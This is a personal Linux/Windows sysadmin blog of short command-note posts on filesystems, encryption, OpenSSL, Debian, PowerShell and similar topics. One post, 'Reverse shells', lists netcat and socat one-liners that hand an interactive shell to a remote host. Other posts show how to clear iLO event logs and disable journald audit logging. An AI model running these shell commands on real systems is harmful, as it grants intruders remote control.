mergerfs
September 6, 2019 — 18:36

Author: silver  Category: linux storage  Comments: Off

Union filesystem (FUSE) like unionfs, aufs and mhddfs. Merge multiple paths and mount them, similar to concatenating.

Get it here: https://github.com/trapexit/mergerfs or from OS package repository.

Compared to (older) alternatives mergerfs seems very stable over the past months I’ve been using it. It offers multiple options on how to spread the data over the used drives.

Optionally SnapRAID can be used to add parity disk(s) to protect against disk failures (https://www.snapraid.it).

Create/mount pool

Example using 5 devices /dev/sd[b-f]

Disks are already partitioned have a fs

for i in {b..f}; do
  mkdir /mnt/sd${i}1
  mount /dev/sd${i}1 /mnt/sd${i}1 && \
  mkdir /mnt/sd${i}1/mfs
done && \
mkdir /mnt/mergerfs && \
mergerfs -o defaults,allow_other,use_ino /mnt/sd*/mfs /mnt/mergerfs

And here’s the result from ‘df’:

/dev/mapper/sdb1             3.6T  100M  3.5T  1% /mnt/sdb1
/dev/mapper/sdc1             3.6T  100M  3.5T  1% /mnt/sdc1
/dev/mapper/sdd1             3.6T  100M  3.5T  1% /mnt/sdd1
/dev/mapper/sde1             3.6T  100M  3.5T  1% /mnt/sde1
/dev/mapper/sdf1             3.6T  100M  3.5T  1% /mnt/sdf1
mergerfs                      18T  500M  8.5T  1% /mnt/mergerfs

Changing pool

remove old drive from mergerfs pool

xattr -w user.mergerfs.srcmounts -/mnt/data1 /mnt/pool/.mergerfs

add new drive

xattr -w user.mergerfs.srcmounts +/mnt/data4 /mnt/pool/.mergerfs

some other mount options (-o)

  • use_ino make mergerfs supply inodes
  • fsname=example-name name in df
  • no_splice_write fixes page errors in syslog

https://github.com/trapexit/mergerfs#mount-options

Pool info

xattr -l /mnt/mergerfs/.mergerfs
# or:
mergerfs.ctl -m /mnt/mergerfs list values

mergerfs.ctl -m /mnt/mergerfs info

PowerShell
July 9, 2019 — 9:17

Author: silver  Category: dev linux windows  Comments: Off

I’ve been using PS for a while now and I don’t hate it anymore :) In fact I think it’s very usable for lots of tasks and automation.

Some Useful commands:

  • Get-Command *help* or Get-Command-Module PackageManagement
  • Get-Member to view properties e.g. Get-Disk | Get-Member
  • Get-Alias
  • Get-ExecutionPolicy -List
  • Set-ExecutionPolicy -ExecutionPolicy RemoteSigned
  • piping to select, sort and where
  • Invoke-WebRequest $url

CSV, XML and JSON support is included:

  • Import-CSV Export-CSV
  • ConvertTo-XML
  • ConvertFrom-Json ConverTO-Json

And stuff like:

  • Logging sessions: Start-Transcript Stop-Transcript
  • Viewing Certificates: cd Cert:\ (now you can ‘dir’ etc)
  • Run as admin: powershell.exe -Command "Start-Process cmd -Verb RunAs"
  • PS Linting: https://github.com/PowerShell/PSScriptAnalyzer

Remote usage is also possible over WinRM (or OpenSSH):

  • Enter-PSSession -ComputerName <host>

Then there’s Loops, Params, Arrays and Hash Tables e.g. foreach, Param([string]$arg), @() and @{}

More info:

Cgroups and NS
May 30, 2019 — 21:18

Author: silver  Category: linux  Comments: Off

Linux Control Groups and Namespaces

Used for limiting and isolation

Docs

Utils

  • lsns
  • nsenter
  • cgroup-tools pkg (cgget, cgset, …)

Network

  • ip netns list
  • ip netns identify <pid>
  • ip netns exec <netns> ip
  • or: ip -n|-netns

Processes

  • ps axwww -o cgroup
  • ps axwww -o cgroup,user,pid,%cpu,%mem,vsz,rss,tname,stat,start,time,comm
  • ps axwww -o ipcns,mntns,netns,pidns,userns,utsns,pid,comm

Filesystem

  • /proc/<pid>/ns
  • /sys/fs/cgroup

Systemd

Vim linting
May 30, 2019 — 20:50

Author: silver  Category: dev linux  Comments: Off

Linting is basically making sure source code is correct.

For Vim there’s ALE: Asynchronous Lint Engine. It supports multiple tools like cpplint for C/C++, ShellCheck for shell scripts, phan for PHP etc etc.

Download

Get it here: https://github.com/w0rp/ale

Commands

  • ALELint
  • ALEEnable
  • ALEDisable
  • ALENext
  • ALEPrevious

.vimrc

To use Ctrl+j and Ctrl+k to moving between errors:

nmap <silent> <C-k> <Plug>(ale_previous_wrap)
nmap <silent> <C-j> <Plug>(ale_next_wrap)
Zonemaster
December 8, 2018 — 17:52

Author: silver  Category: linux  Comments: Off

Zonemaster is an Open source DNS validation tool

Source: https://github.com/zonemaster/zonemaster
Hosted: https://www.zonemaster.net/domain_check

Install Perl modules

Dependencies:

cpanm File::ShareDir cpanm File::Slurp Hash::Merge IO::Socket::INET6 List::MoreUtils Mail::RFC822::Address Module::Find Moose Net::IP Readonly::XS Text::CSV Devel::CheckLib

Zonemaster LDNS and Engine:

cpanm Zonemaster::LDNS
cpanm Zonemaster::Engine

Test

time perl -MZonemaster::Engine -e &#039;print map {&quot;$_\n&quot;} Zonemaster::Engine-&gt;test_module(&quot;BASIC&quot;, &quot;zonemaster.net&quot;)&#039;

Install Perl modules

Dependencies:

cpanm MooseX::Getopt Text::Reflow Module::Install

Zonemaster CLI:

cpanm Zonemaster::CLI

Examples

zonemaster-cli --test basic zonemaster.net
zonemaster-cli --no-ipv6 --show_level --show_module --progress --level INFO --test Syntax example.com
GNU find
March 30, 2018 — 14:51

Author: silver  Category: linux windows  Comments: Off

Just a few useful ‘find’ examples

Exclude:

find . -path ./foo -prune -o -name bar
find /home \( -path /usr/data -prune -o -path /usr/src \) -prune -o -name foo -print
find . -name Makefile -not -path foo
find . -type d ! -regex .*\/\(foo\|bar\).* \;

Permissions:

find . -perm -775
find . -perm /u+w,g+
find . -printf "%m:%f\n"
find . -printf "%m %h/%f\n"|grep -v '^\(644\|755\)'

Print date:

find -type f -printf '%TF %.8TT %p\n'

Windows:

find.exe . -name *.exe -exec certutil -hashfile {} SHA512 ; >c:\hash.txt

Updating CPU Microcode
March 28, 2018 — 12:50

Author: silver  Category: linux windows  Comments: Off

BITS

Tool from Intel called “BIOS Implementation Test Suite” that can do several things including handling microcode:
https://biosbits.org
https://github.com/biosbits/bits
https://github.com/mkorthof/bits

Linux

  • load/update microcode using pkg:
  • load/update intel microcode manually:
    - get latest tgz from intel: see below
    - backup/copy files: /lib/firmware/intel-ucode
    - check kernel config: grep MICROCODE /boot/config-*
    - run iucode_tool:

    /usr/sbin/iucode_tool -tb -lS /lib/firmware/intel-ucode/*

    - update initramfs: update-initramfs -u -k all

  • reloading microcode:
    echo 1 > /sys/devices/system/cpu/microcode/reload
    or: rmmod cpuid; modprobe cpuid

  • show version:
    dmesg | grep microcode or: grep microcode /proc/cpuinfo

  • skip loading microde on boot:
    add to grub cmdline: dis_ucode_ldr

Windows

Microsoft includes certain microcode updates in Windows CPU’s. For example: KB4090007, KB3064209, KB2970215.

  • show version:
    - get hwinfo64 and goto “Central Processor(s)” > “Microcode Update Revision”
    - or get “Read & Write Everything” (RWEverything) from http://rweverything.com

  • Get Microcode

    Download the latest version from Intel:
    https://downloadcenter.intel.com/download/27431/Linux-Processor-Microcode-Data-File?v=t.

    Magic SysRq Key
    November 25, 2017 — 22:19

    Author: silver  Category: linux  Comments: Off

    How to use SysRq (Print Screen key)

    ( “REISUB” )

    enable:

    echo 1 > proc/sys/kernel/sysrq
    

    permanently:

    /etc/sysctl.d/local.conf
    kernel.sysrq=1
    

    To BREAK: CTRL+PAUSE (Serial)

    ALT+SysReq+KEY
    When logged in using SSH the SysRq may be accessible by writing to /proc/sysrq-trigger
    echo s > /proc/sysrq-trigger

    useful options:

    • b: Immediately reboot the system, without unmounting or syncing filesystems
      echo b > proc/sysrq-trigger
    • e: Send the SIGTERM signal to all processes except init (PID 1)
    • f: Call oom_kill, which kills a process to alleviate an OOM condition:
    • s: Sync all mounted filesystems:
    • t: Output a list of current tasks and their information to the console:
    • u: Remount all mounted filesystems in read-only mode
    • w: Display list of blocked (D state) tasks
    • space: Print a summary of available magic SysRq keys

    https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/plain/Documentation/admin-guide/sysrq.rst
    https://en.wikipedia.org/wiki/Magic_SysRq_key

    GoAccess
    November 25, 2017 — 18:04

    Author: silver  Category: linux web  Comments: Off

    GoAccess is a “real-time web log analyzer” which can output in CLI or HTML (like webalizer, awstats and piwik etc). It works out of the box with Apache, for lighttpd you probably need to specify the log format. Examples below are for lighttpd. Run “goaccess /var/log/httpd/access.log” without any other arguments and it will ask for the log format and drop you into the Dashboard (text based gui).

    CLI

    no conf, just arguments:

    goaccess /var/log/lighttpd/access.log \
    --date-format=%d/%b/%Y \
    --time-format='%T %z' \
    --log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"'
    

    -or-

    change /etc/goaccess.conf:

    date-format %d/%b/%Y:%T %z
    log-format %h %v %e [%d] "%r" %s %b "%R" "%u"
    

    HTML

    Output to “static” html file.

    current log:

    goaccess /var/log/lighttpd/access.log \
      --date-format=%d/%b/%Y \
      --time-format='%T %z' \
      --log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"' \
      --output=/var/www/html/goaccess.html
    

    use all logs:

    zcat -f /var/log/lighttpd/access.log*gz | goaccess \
      --date-format=%d/%b/%Y \
      --time-format='%T %z' \
      --log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"' \
      --ignore-crawlers \
      --with-output-resolver \
      -e 127.0.0.1 -e ::1 -e exclude.example.com
      --output=/var/www/html/goaccess.html
    

    Server

    The last option is to run it as Server using WebSocket. This allows it to:

    • output realtime HTML: --real-time-html
    • run as daemon: --daemonize
    • use FIFO: --fifo-in= --fifo-out=
    • use HTTPS: --ssl-cert= --ssl-key= --ws-url=wss://url

    live log:

    goaccess /var/log/lighttpd/access.log \
     --date-format=%d/%b/%Y \
     --time-format='%T %z' \
     --log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"' \
     --output=/var/www/html/goaccess.html \
     --real-time-html \
     --ssl-cert=//etc/ssl/certs/cert.pem \
     --ssl-key=/etc/ssl/private/privkey.pem --ws-url=wss://example.com:7890
    

    Now https://example.com/goaccess.html should should a live Dashboard (tcp port 7890 needs to be open for client).

    perf
    August 23, 2017 — 16:45

    Author: silver  Category: linux  Comments: Off

    perf – performance analysis tools for Linux

    Start with:

    perf top
    perf bench all

    Example:

    To find out why “kworker” process (kernel per-cpu threads) has high CPU usage:

    • record 10 seconds of backtraces on all CPUs to perf.data:
      perf record -g -a sleep 10
    • analyse recording:
      perf report

    More info:
    https://www.brendangregg.com/perf.html
    https://askubuntu.com/questions/33640/kworker-what-is-it-and-why-is-it-hogging-so-much-cpu

    Debian
    August 23, 2017 — 15:37

    Author: silver  Category: linux  Comments: Off

    Remote upgrade using aptitude:

    1. echo “defscrollback 10000” >>/root/.screenrc
    2. screen
    3. /etc/sysctl.conf:
      # on kernel panic reboot after 60s
      kernel.panic = 600
      # enable magic sysrq key
      kernel.sysrq=1</pre>
    4. In /etc/apt/sources.list: change old to new dist (or “stable” etc)
      ( if needed: apt-get install debian-archive-keyring )
    5. aptitude update
    6. aptitude safe-upgrade
      ( optionally/if needed: full-upgrade, dist-upgrade )

    Change default editor:

    sudo update-alternatives --config editor

    Install build tools:

    apt-get install build-essential

    pkg install dates:

    for file_list in `ls -rt /var/lib/dpkg/info/*.list`; do \
      stat_result=$(stat --format=%y "$file_list"); \
      printf "%-50s %s\n" $(basename $file_list .list) "$stat_result"; \
    done
    

    backports:

    apt-get -t stretch-backports install “package”
    aptitude -t stretch-backports install “package”

    /etc/apt/preferences:

    Package: *
    Pin: release a=stable
    Pin-Priority: 900
    
    Package: *
    Pin: release o=Debian
    Pin-Priority: -10
    

    “testing” packages:

    install a pkg from testing:
    sudo apt-get -t testing install tmux
    show all testing pkgs:
    aptitude search -F "%p %V %v" '?narrow(~i, ~Atesting)
    ( stable, unstable, oldstable, etc )

    apt-get install package=version

    ping
    March 4, 2017 — 16:01

    Author: silver  Category: linux  Comments: Off

    When trying to ping as non root user you might get the following error:

    ping: icmp open socket: Operation not permitted

    There are several ways to fix this:

    reinstall pkg (debian):

    $ sudo apt-get install --reinstall iputils-ping
    

    (sets cap)

    manually set cap:

    $ sudo setcap cap_net_raw+ep /bin/ping
    $ sudo setcap cap_net_raw+ep /bin/ping6
    $ sudo getcap /bin/ping
    $ sudo getcap /bin/ping6
    

    needs kernel config:
    CONFIG_EXT4_FS_SECURITY=y


    dont use SOCK_RAW:

    socket(PF_INET, SOCK_DGRAM, PROT_ICMP)

    $ cat /proc/sys/net/ipv4/ping_group_range
    $ sysctl net.ipv4.ping_group_range
    • “1 0” default, nobody except root
    • “100 100” single group
    • “0 2147483647” everyone (max gid)
    $ sysctl net.ipv4.ping_group_range = "0 2147483647"
    


    /etc/sysctl.d/local.conf
    net.ipv4.ping_group_range=0 2147483647


    suid:

    chmod +s /usr/ping
    chmod +s /usr/ping6
    
    Linux Audit
    March 4, 2017 — 15:43

    Author: silver  Category: linux  Comments: Off

    First make sure “auditd” is started

    add rules:

    auditctl -a always,exit -S all -F path=/etc/passwd -F key=config1
    auditctl -w /etc/passwd -p rwa -k config2
    

    del rules:

    auditctl -d always,exit -S all -F path=/etc/passwd -F key=config1
    auditctl -W /etc/passwd -p rwa -k config2
    

    (or restart auditd)

    make permanent:

    add rules to /etc/audit/rules.d/audit.rules

    show results:

    ausearch -ts today -k config1
    aureport -k
    

    disable audit logs:

    systemctl mask systemd-journald-audit.socket
    
    HP ProLiant
    December 9, 2016 — 21:54

    Author: silver  Category: linux other  Comments: Off

    Boot:

    • BIOS: F10
    • HP SSA Smart Storage Administrator / ACU Array Configuration Utility: F5
    • ORCA / Options ROM for Configuring Arrays: Press any key…, F8
    • HP IP: F10
    • Boot Menu: F11

    Install HP software:

    Repository:

    wget http://downloads.linux.hp.com/add_repo.sh
    sh add_repo.sh spp -d redhat -r 6.7 -n
    sh add_repo.sh spp -d redhat -r 6.7
    
    sh add_repo.sh spp -d redhat -r 5.10 -n
    sh add_repo.sh spp -d redhat -r 5.10
    
    sed -i 's/gpgcheck=0/gpgcheck=1/' /etc/yum.repos.d/HP-spp.repo
    rpm --import http://downloads.linux.hp.com/SDR/hpPublicKey1024.pub
    rpm --import http://downloads.linux.hp.com/SDR/hpPublicKey2048.pub
    rpm --import http://downloads.linux.hp.com/SDR/hpPublicKey2048_key1.pub
    
    for i in $( rpm -qa gpg-pubkey* ); do rpm -qi $i |grep -B 8 Hewlett; done
    yum install hpacucli
    yum install hponcfg
    

    HP Server Management Application and Agents Command Line Interface

    # hpasmcli -s "clear iml"

    HP Lights-Out Online Configuration Utility for Linux

    hponcfg -f Clear_EventLog.xml -i

    Clear_EventLog.xml:

    <RIBCL VERSION="2.0">
     <LOGIN USER_LOGIN="Administrator" PASSWORD="xxx">
     <RIB_INFO MODE="write">
     <CLEAR_EVENTLOG/>
     </RIB_INFO>
     </LOGIN>
    </RIBCL>
    

    Clear_IML.xml:

    <RIBCL VERSION="2.0">
      <LOGIN USER_LOGIN="Administrator" PASSWORD="xxx">
      <SERVER_INFO MODE="write">
        <CLEAR_IML/>
      </SERVER_INFO>
      </LOGIN>
    </RIBCL>
    

    Administrator_reset_pw.xml:

    <ribcl VERSION="2.0">
     <login USER_LOGIN="Administrator" PASSWORD="boguspassword">
      <user_INFO MODE="write">
       <mod_USER USER_LOGIN="Administrator">
        <password value="NewPass123"/>
       </mod_USER>
      </user_INFO>
     </login>
    </ribcl>
    
    gnome-keyring
    November 26, 2016 — 17:52

    Author: silver  Category: linux  Comments: Off

    Restart:

    gnome-keyring-daemon -r -d

    If doesn’t suffice this extra steps might help:

    pgrep -f gnome-keyring-daemon
    rm -rf ~/.cache/keyring-*
    setsid /usr/bin/gnome-keyring-daemon /dev/null 2>&1
    ln -s ~/.cache/keyring-* $GNOME_KEYRING_CONTROLA
    /usr/bin/gnome-keyring-daemon --start --components=pkcs11
    /usr/bin/gnome-keyring-daemon --start --components=gpg
    /usr/bin/gnome-keyring-daemon --start --components=ssh
    
    find ~/.cache/ -maxdepth 1 -type l -name 'keyring-*' -delete
    
    sendmail with attachment
    November 26, 2016 — 17:48

    Author: silver  Category: linux  Comments: Off

    Oneliner to send email with attachment using sendmail:

    $S Subject
    $B Body
    $A Attachment

    
    
    Display man pages as text
    November 26, 2016 — 15:51

    Author: silver  Category: linux  Comments: Off
    man openssl | cat
    man -P cat openssl
    groff -t -e -mandoc -Tascii manpage.1 | col -bx > manpage.txt
    
    Linux Disk Encryption
    November 26, 2016 — 13:04

    Author: silver  Category: encryption linux  Comments: Off

    Linux Disk Encrption using Device Mapper, cryptsetup frontend and Linux Unified Key Setup LUKS (on disk format).

    Setup:

    cryptsetup -y -v luksFormat /dev/sdb1
    cryptsetup luksOpen /dev/sdb1 foo
    cryptsetup status foo -v

    Test:

    cryptsetup --test-passphrase open /dev/sdb1 # (non-LUKS)
    cryptsetup luksOpen --test-passphrase /dev/sdb1
    cryptsetup isLuks /dev/sdb1 && echo IMaLUKS
    cryptsetup luksDump /dev/sdb1
    

    Change:

    (asks current passphase first)

    cryptsetup -y luksChangeKey <target device> -S <target key slot number>
    cryptsetup -y luksChangeKey /dev/sdb1 -S 1
    

    Or use gui gnome-disks:

    • Disks (gnome-disks)
    • 1.0TB Hard Disk
    • Volumes: “Partition 1 1.0 TB LUKS”
    • Cogs/wheels

    Add/remove key:

    sudo cryptsetup -y luksAddKey ENCRYPTED_PARTITION
    sudo cryptsetup luksRemoveKey ENCRYPTED_PARTITION
    

    Various:

    dmsetup ls --tree
    lsblk
    lsblk --fs
    
    Reverse shells
    November 26, 2016 — 12:45

    Author: silver  Category: linux  Comments: Off

    USING NETCAT:

    SERVER/LISTEN:

    netcat -lvp 9999
    

    CLIENT:

    netcat -e /bin/sh host.name 9999
    
    
    
    
    

    NICER SHELL:

    python -c 'import pty; pty.spawn("/bin/bash")'
    ( sleep 1; echo 'bla' ) | python -c "import pty; pty.spawn(['/usr/bin/sudo','-S','whoami']);"
    

     


     

    USING SOCAT:

    SERVER/LISTEN:

    socat file:`tty`,raw,echo=0 tcp-listen:8888
    

    CLIENT:

    socat tcp-connect:host.name:8888 exec:'bash -li',pty,stderr,setsid,sigint,sane
    

    CLIENT:

    socat tcp:host.name:8888 exec:"bash -li",pty,stderr,setsid,sigint,sane
    
    socat TCP-LISTEN:8888,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
    socat FILE:`tty`,raw,echo=0 TCP:1.2.3.4:8888
    
    export STY=
    stty rows 40 cols 130
    stty rows 40 cols 230
    
    EncFS
    November 25, 2016 — 22:02

    Author: silver  Category: encryption linux  Comments: Off

    Install on CentOS6:

    Required packages:

    yum install -y fuse-2.8.3-5.el6.x86_64 
    yum install -y fuse-libs.x86_64
    yum install -y fuse-devel.x86_64
    
    usermod -a -G fuse <your_user>
    
    yum install -y git
    yum install -y cmake
    
    yum install -y boost-serialization.x86_64
    yum install -y openssl-devel.x86_64
    yum install -y rlog-devel.x86_64
    yum install -y tinyxml2-devel.x86_64 
    yum install -y gettext-devel.x86_64
    
    yum install -y centos-release-scl
    yum install -y devtoolset-3-gcc-c++ -y
    

    Compile:

    scl enable devtoolset-3 bash
    
    git clone https://github.com/vgough/encfs
    
    cd encfs
    mkdir build
    cd build
    cmake ..
    make
    make test
    make install
    make package
    
    mkdir ~/test
    mkdir ~/Private
    

    Test:

    encfs ~/Private ~/test
    echo testing > ~/test/testfile
    
    fusermount -u ~/test
    
    OpenVPN AS
    November 25, 2016 — 21:31

    Author: silver  Category: encryption linux  Comments: Off

    OpenVPN Access Server is quite easy and fast to setup and includes a web gui.

    Download:

    Configuration:

    Clickety click in the gui, plus some hardening:

    Server:

    Client:

    auth SHA512
    cipher AES-256-CBC
    

    Connect with SSH + SOCKS Proxy + OTP:

    $ ssh -D 1 to remote host

    Ban user:

    Ban a user from logging into the VPN or Web server
    (doesn’t affect a user who is already logged in — for this, use DisconnectUser below):

    /usr/local/openvpn_as/scripts/sacli --user <USER> --key prop_deny --value true UserPropPut
    

    Re-admit a user who was previously banned:

    /usr/local/openvpn_as/scripts/sacli --user <USER> --key prop_deny --value false UserPropPut
    

    Disconnect a user:

    /usr/local/openvpn_as/scripts//sacli --user <USER> --key prop_deny --value true UserPropPut
    

    Set client cert keysize:

    /usr/local/openvpn_as/scripts/sa --keysize=4096 Init
    

    Generating init scripts:

    /usr/local/openvpn_as/scripts/openvpnas_gen_init [--auto]

    Google Authenticator:

    Unlock a secret:

    ./sacli -u <USER> --lock 0 GoogleAuthLock

    Lock a secret:

    ./sacli -u <USER> --lock 1 GoogleAuthLock

    Generate a new, unlocked secret:

    ./sacli -u <USER> --lock 0 GoogleAuthRegen

    Generate a new, locked secret:

    ./sacli -u <USER> --lock 1 GoogleAuthRegen

    Enable Google Authenticator for all accounts:

    ./sacli --key vpn.server.google_auth.enable --value true ConfigPut

    Enable for 1 user:

    ./sacli --user <USER_OR_GROUP> --key prop_google_auth --value true UserPropPut

    Disable:

    ./sacli --key vpn.server.google_auth.enable --value false ConfigPut

    Disable for 1 user:

    ./sacli --user <USER_OR_GROUP> --key prop_google_auth --value false UserPropPut
    

    Revoke and reissue secret:

    ./sacli -u <USER> GoogleAuthRegen

    Retrieve current user properties:

    ./confdba -us -p

    Port sharing:

    Advanced VPN Settings: port-share 127.0.0.1 10443
    (tcp mode only)

    OpenSSL
    November 25, 2016 — 21:26

    Author: silver  Category: encryption linux  Comments: Off

    List deleted open files (after update):

    lsof | grep -i libssl | grep DEL | awk '{print $1}' | sort | uniq
    

    Generate CSR, self signed cert:

    openssl genrsa -out rootCA.key 2048
    openssl genrsa -des3 -out rootCA.key 2048
    openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 3650 -out rootCA.pem
    openssl x509 -req -in server.csr -CA rootCA.pem -CAkey rootCA.key -CAcreateserial -out server.crt -days 3650 -sha256
    

    View CSR

    openssl req -in file.csr -noout -text

    View cert fingerprint

    openssl x509 -fingerprint -noout -in file.crt -sha256
    openssl x509 -fingerprint -noout -in file.crt -sha1
    openssl x509 -fingerprint -noout -in file.crt -md5
    

    View ciphers:

    openssl ciphers -v 'TLSv1' | sort

    Test ciphers:

    openssl s_client -connect google.com:443 -cipher "EDH"
    openssl s_client -connect google.com:443 -cipher "RC4"
    openssl s_client -connect google.com:443 -tls1
    openssl s_client -connect google.com:443 -tls1_1
    openssl s_client -connect google.com:443 -tls1_2
    
    echo -n | openssl s_client -connect google.com:443
    nmap --script ssl-enum-ciphers -p 443
    
    

    Get fingerprint from live SSL cert (IRC):

    echo | openssl s_client -connect efnet.port80.se:6697 |& openssl x509 -fingerprint -noout -sha256
    echo | gnutls-cli -p 6697 irc.underworld.no --print-cert | sed -n '/-----BEGIN CERT/,/-----END CERT/p' |& openssl x509 -fingerprint -noout -sha256
    

    Show fingerprint:

    openssl x509 -in cert.pem -fingerprint -noout
    

    To change the password of your private key:

    openssl rsa -des3 -in ca.key -out ca_new.key
    mv ca_new.key ca.key
    

    Verifying that a Private Key Matches a Certificate

    $ openssl x509 -noout -modulus -in server.pem | openssl md5 ;\
    openssl rsa -noout -modulus -in server.key | openssl md5
    

    Get the MD5 fingerprint of a certificate using OpenSSL

    openssl dgst -md5 certificate.der

    Get the MD5 fingerprint of a CSR using OpenSSL

    openssl dgst -md5 csr.der

    Debug SMTP/STARTTLS:

    openssl s_client -debug -starttls smtp -crlf -connect localhost:25
    File Encryption
    November 25, 2016 — 18:44

    Author: silver  Category: encryption linux  Comments: Off

    All of these are FUSE based except for eCryptfs.

    Comparison: https://nuetzlich.net/gocryptfs/comparison

     

    CryFS
    November 25, 2016 — 18:18

    Author: silver  Category: encryption linux  Comments: Off

    Download:
     
    http://cryfs.org
    https://github.com/cryfs/cryfs
     
    Compile under CentOS 6:
     

    yum install https://www.softwarecollections.org/repos/denisarnaud/boost157/epel-6-x86_64/noarch/denisarnaud-boost157-epel-6-x86_64-1-2.noarch.rpm
    yum install -y boost157-devel.x86_64 boost157-static.x86_64 
    
    scl enable devtoolset-3 bash
    export BOOST_ROOT=/usr/include/boost157
    export BOOST_LIBRARYDIR=/usr/lib64/boost157
    mkdir cmake && cd cmake
    cmake ..
    make
    sudo make install
    
    Serial console
    November 25, 2016 — 17:14

    Author: silver  Category: linux  Comments: Off

    /etc/default/grub:

    GRUB_CMDLINE_LINUX="video=off elevator=deadline console=tty0 console=ttyS0,115200"
    GRUB_TERMINAL=serial
    GRUB_SERIAL_COMMAND="serial --unit=0 --speed=115200 --stop=1"
    

    /etc/inittab:

    0:2345:respawn:/sbin/agetty -8 ttyS0 115200 vt100